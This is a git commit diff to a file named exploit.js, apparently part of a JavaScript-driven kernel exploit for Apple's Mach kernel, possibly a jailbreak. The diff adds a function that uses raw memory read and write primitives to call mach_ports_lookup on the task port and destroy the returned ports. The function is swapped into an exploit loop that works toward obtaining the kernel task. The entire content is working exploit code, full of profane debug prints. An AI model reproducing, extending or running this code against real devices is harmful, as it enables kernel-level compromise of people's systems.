fuck it

1 files changed, 27 insertions, 1 deletions

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 7ec7cc3..55ac673 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -368,6 +368,32 @@ function mach_ports_lookup_shit() {
 //	return 0x42603;
 }
 
+function mach_ports_lookup_shit_dealloc() {
+	printf("fuck\n");
+	var arrz = shit_heap(4);
+	printf("fuck\n");
+	write_u32(arrz, 0);
+	printf("fuck\n");
+	var sz = shit_heap(4);;
+	printf("fuck\n");
+	write_u32(sz, 3);
+	printf("fuck\n");
+//	var mts = mach_task_self();
+	printf("fuck\n");
+	calls4arg("mach_ports_lookup", task_self, arrz, sz, 0);
+	scall("printf", "done %x %x %x %x\n", read_u32(read_u32(arrz) + 0), read_u32(read_u32(arrz) + 4), read_u32(read_u32(arrz) + 8), read_u32(kp));
+	printf("mpl success\n");
+
+	for (var i = 0; i < read_u32(sz); i++) {
+		if (read_u32(read_u32(arrz) + (i << 2)) != 0) {
+			mach_port_destroy(mach_task_self(), read_u32(read_u32(arrz) + (i << 2)));
+		}
+	}
+
+	return read_u32(read_u32(arrz) + 8);
+//	return 0x42603;
+}
+
 var kernel_task_addr = 0;
 function get_kernel_task() {
 	var ret = 0;
@@ -458,7 +484,7 @@ again: while (true) {
 	var arrmpt = shit_heap(8);
 	write_u32(arrmpt, 0);
 	write_u32(arrmpt + 4, 0);
-	mach_ports_lookup_shit();
+	mach_ports_lookup_shit_dealloc();
 	var ret__ = r3gister(mach_task_self(), arrmpt, 2, 3);
 	mach_ports_lookup_shit();
 	printf("%d %s\n", ret__, mach_error_string(ret__));